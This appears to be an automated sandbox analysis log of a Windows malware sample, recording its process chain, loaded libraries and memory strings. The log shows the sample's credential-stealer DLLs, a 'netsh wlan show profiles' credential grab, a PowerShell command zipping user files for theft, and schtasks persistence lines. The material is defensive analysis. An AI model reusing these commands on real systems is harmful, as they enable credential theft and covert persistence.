                              Source: c884f8452a.exe, 00000014.00000003.2883884113.0000000005380000.00000004.00001000.00020000.00000000.sdmp, c884f8452a.exe, 00000014.00000002.3269708121.0000000000AA1000.00000040.00000001.01000000.00000014.sdmp, MPGPH131.exe, 0000001C.00000003.2928548272.0000000004FB0000.00000004.00001000.00020000.00000000.sdmp, MPGPH131.exe, 0000001C.00000002.3244160511.0000000000891000.00000040.00000001.01000000.00000015.sdmp, MPGPH131.exe, 0000001D.00000002.3252023529.0000000000891000.00000040.00000001.01000000.00000015.sdmp, MPGPH131.exe, 0000001D.00000003.2928357410.0000000004E00000.00000004.00001000.00020000.00000000.sdmp, c884f8452a.exe, 00000024.00000003.3049065543.00000000048F0000.00000004.00001000.00020000.00000000.sdmp, c884f8452a.exe, 00000024.00000002.3145142996.0000000000AA1000.00000040.00000001.01000000.00000014.sdmp, RageMP131.exe, 0000002D.00000003.3127053365.0000000005330000.00000004.00001000.00020000.00000000.sdmp, RageMP131.exe, 0000002D.00000002.3204405230.0000000000371000.00000040.00000001.01000000.00000017.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                              Source: c884f8452a.exe, 00000014.00000003.2883884113.0000000005380000.00000004.00001000.00020000.00000000.sdmp, c884f8452a.exe, 00000014.00000002.3269708121.0000000000AA1000.00000040.00000001.01000000.00000014.sdmp, MPGPH131.exe, 0000001C.00000003.2928548272.0000000004FB0000.00000004.00001000.00020000.00000000.sdmp, MPGPH131.exe, 0000001C.00000002.3244160511.0000000000891000.00000040.00000001.01000000.00000015.sdmp, MPGPH131.exe, 0000001D.00000002.3252023529.0000000000891000.00000040.00000001.01000000.00000015.sdmp, MPGPH131.exe, 0000001D.00000003.2928357410.0000000004E00000.00000004.00001000.00020000.00000000.sdmp, c884f8452a.exe, 00000024.00000003.3049065543.00000000048F0000.00000004.00001000.00020000.00000000.sdmp, c884f8452a.exe, 00000024.00000002.3145142996.0000000000AA1000.00000040.00000001.01000000.00000014.sdmp, RageMP131.exe, 0000002D.00000003.3127053365.0000000005330000.00000004.00001000.00020000.00000000.sdmp, RageMP131.exe, 0000002D.00000002.3204405230.0000000000371000.00000040.00000001.01000000.00000017.sdmpBinary or memory string: UPDATE %Q.%s SET sql = sqlite_rename_table(sql, %Q), tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
                              Source: rundll32.exe, 00000008.00000002.2871819933.000001E17AE8F000.00000004.00000020.00020000.00000000.sdmp, c884f8452a.exe, 00000014.00000003.2978212493.0000000007F0A000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001C.00000003.3053135954.0000000007CC2000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001C.00000003.3029531974.0000000007CAC000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001C.00000003.3026186524.0000000007CAC000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001D.00000003.3035311559.00000000079E6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                              Source: SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeVirustotal: Detection: 54%
                              Source: SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeReversingLabs: Detection: 50%
                              Source: SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                              Source: explorha.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                              Source: amert.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeFile read: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe
                              Source: unknownProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe"
                              Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeProcess created: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe "C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe"
                              Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main
                              Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profiles
                              Source: C:\Windows\System32\netsh.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\a091ec0a6e2227\clip64.dll, Main
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process created: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe "C:\Users\user\AppData\Local\Temp\1000054001\amert.exe"
                              Source: unknown Process created: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process created: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe "C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe"
                              Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com/account
                              Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                              Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2172 --field-trial-handle=1920,i,17797173087143306694,7612419587186816950,262144 /prefetch:8
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process created: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe "C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe"
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST
                              Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST
                              Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5540 --field-trial-handle=1920,i,17797173087143306694,7612419587186816950,262144 /prefetch:8
                              Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5660 --field-trial-handle=1920,i,17797173087143306694,7612419587186816950,262144 /prefetch:8
                              Source: unknown Process created: C:\ProgramData\MPGPH131\MPGPH131.exe C:\ProgramData\MPGPH131\MPGPH131.exe
                              Source: unknown Process created: C:\ProgramData\MPGPH131\MPGPH131.exe C:\ProgramData\MPGPH131\MPGPH131.exe
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process created: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe "C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe"
                              Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe "C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe"
                              Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com/account
                              Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2188 --field-trial-handle=1636,i,5624198576768077496,445941079671464976,262144 /prefetch:8
                              Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3632 --field-trial-handle=1920,i,17797173087143306694,7612419587186816950,262144 /prefetch:8
                              Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe "C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe"
                              Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5596 -s 2132
                              Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3872 --field-trial-handle=1920,i,17797173087143306694,7612419587186816950,262144 /prefetch:8
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4012 -s 2052
                              Source: C:\ProgramData\MPGPH131\MPGPH131.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3436 -s 1948
                              Source: unknown Process created: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe "C:\Users\user\AppData\Local\RageMP131\RageMP131.exe"
                              Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe "C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe"
                              Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com/account
                              Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2056 --field-trial-handle=1984,i,457568203381776828,11237095852378400144,262144 /prefetch:8
                              Source: unknown Process created: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                              Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe "C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe"
                              Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Process created: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe "C:\Users\user\AppData\Local\Temp\1000187001\build12.exe"
                              Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\c1ec479e5342a2\cred64.dll, Main
                              Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\System32\rundll32.exe
                              Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Process created: C:\Users\user\AppData\Local\Temp\1000188001\build12.exe
                              Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exe Process created: C:\Windows\System32\conhost.exe
                              Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\netsh.exe
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe Process created: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe "C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe"
                              Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main
                              Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\System32\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main
                              Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles
                              Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal
                              Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe "C:\Users\user\AppData\Local\RageMP131\RageMP131.exe"
                              Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Windows\System32\netsh.exe
                              Source: C:\Windows\System32\netsh.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Windows\System32\netsh.exeSection loaded: activeds.dllJump to behavior
                              Source: C:\Windows\System32\netsh.exeSection loaded: polstore.dllJump to behavior
                              Source: C:\Windows\System32\netsh.exeSection loaded: winipsec.dllJump to behavior
                              Source: C:\Windows\System32\netsh.exeSection loaded: adsldpc.dllJump to behavior
                              Source: C:\Windows\System32\netsh.exeSection loaded: adsldpc.dllJump to behavior
                              Source: C:\Windows\System32\netsh.exeSection loaded: nshwfp.dllJump to behavior
                              Source: C:\Windows\System32\netsh.exeSection loaded: cabinet.dllJump to behavior
                              Source: C:\Windows\System32\netsh.exeSection loaded: p2pnetsh.dllJump to behavior
                              Source: C:\Windows\System32\netsh.exeSection loaded: p2p.dllJump to behavior
                              Source: C:\Windows\System32\netsh.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Windows\System32\netsh.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Windows\System32\netsh.exeSection loaded: rpcnsh.dllJump to behavior
                              Source: C:\Windows\System32\netsh.exeSection loaded: wcnnetsh.dllJump to behavior
                              Source: C:\Windows\System32\netsh.exeSection loaded: wlanapi.dllJump to behavior
                              Source: C:\Windows\System32\netsh.exeSection loaded: whhelper.dllJump to behavior
                              Source: C:\Windows\System32\netsh.exeSection loaded: winhttp.dllJump to behavior
                              Source: C:\Windows\System32\netsh.exeSection loaded: wlancfg.dllJump to behavior
                              Source: C:\Windows\System32\netsh.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Windows\System32\netsh.exeSection loaded: wshelper.dllJump to behavior
                              Source: C:\Windows\System32\netsh.exeSection loaded: wevtapi.dllJump to behavior
                              Source: C:\Windows\System32\netsh.exeSection loaded: mswsock.dllJump to behavior
                              Source: C:\Windows\System32\netsh.exeSection loaded: wwancfg.dllJump to behavior
                              Source: C:\Windows\System32\netsh.exeSection loaded: wwapi.dllJump to behavior
                              Source: C:\Windows\System32\netsh.exeSection loaded: wcmapi.dllJump to behavior
                              Source: C:\Windows\System32\netsh.exeSection loaded: rmclient.dllJump to behavior
                              Source: C:\Windows\System32\netsh.exeSection loaded: mobilenetworking.dllJump to behavior
                              Source: C:\Windows\System32\netsh.exeSection loaded: peerdistsh.dllJump to behavior
                              Source: C:\Windows\System32\netsh.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Windows\System32\netsh.exeSection loaded: slc.dllJump to behavior
                              Source: C:\Windows\System32\netsh.exeSection loaded: sppc.dllJump to behavior
                              Source: C:\Windows\System32\netsh.exeSection loaded: gpapi.dllJump to behavior
                              Source: C:\Windows\System32\netsh.exeSection loaded: ktmw32.dllJump to behavior
                              Source: C:\Windows\System32\netsh.exeSection loaded: mprmsg.dllJump to behavior
                              Source: C:\Windows\System32\netsh.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Windows\System32\netsh.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Windows\System32\netsh.exeSection loaded: msasn1.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exeSection loaded: apphelp.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exeSection loaded: winmm.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exeSection loaded: wininet.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exeSection loaded: sspicli.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exeSection loaded: kernel.appcore.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exeSection loaded: uxtheme.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exeSection loaded: mstask.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exeSection loaded: windows.storage.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exeSection loaded: wldp.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exeSection loaded: mpr.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exeSection loaded: dui70.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exeSection loaded: duser.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exeSection loaded: chartv.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exeSection loaded: onecoreuapcommonproxystub.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exeSection loaded: oleacc.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exeSection loaded: atlthunk.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exeSection loaded: textinputframework.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exeSection loaded: coreuicomponents.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exeSection loaded: coremessaging.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exeSection loaded: ntmarta.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exeSection loaded: wintypes.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exeSection loaded: wintypes.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exeSection loaded: wintypes.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exeSection loaded: wtsapi32.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exeSection loaded: winsta.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exeSection loaded: textshaping.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exeSection loaded: propsys.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exeSection loaded: windows.staterepositoryps.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exeSection loaded: windows.fileexplorer.common.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exeSection loaded: iertutil.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exeSection loaded: profapi.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exeSection loaded: explorerframe.dll
                              Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeSection loaded: apphelp.dll
                              Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeSection loaded: winmm.dll
                              Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeSection loaded: wininet.dll
                              Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeSection loaded: kernel.appcore.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exeSection loaded: wsock32.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exeSection loaded: version.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exeSection loaded: winmm.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exeSection loaded: mpr.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exeSection loaded: wininet.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exeSection loaded: iphlpapi.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exeSection loaded: userenv.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exeSection loaded: uxtheme.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exeSection loaded: kernel.appcore.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exeSection loaded: windows.storage.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exeSection loaded: wldp.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exeSection loaded: propsys.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exeSection loaded: profapi.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exeSection loaded: edputil.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exeSection loaded: urlmon.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exeSection loaded: iertutil.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exeSection loaded: srvcli.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exeSection loaded: netutils.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exeSection loaded: windows.staterepositoryps.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exeSection loaded: sspicli.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exeSection loaded: wintypes.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exeSection loaded: appresolver.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exeSection loaded: bcp47langs.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exeSection loaded: slc.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exeSection loaded: sppc.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exeSection loaded: onecorecommonproxystub.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exeSection loaded: onecoreuapcommonproxystub.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exeSection loaded: pcacli.dll
                              Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exeSection loaded: sfc_os.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: esent.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
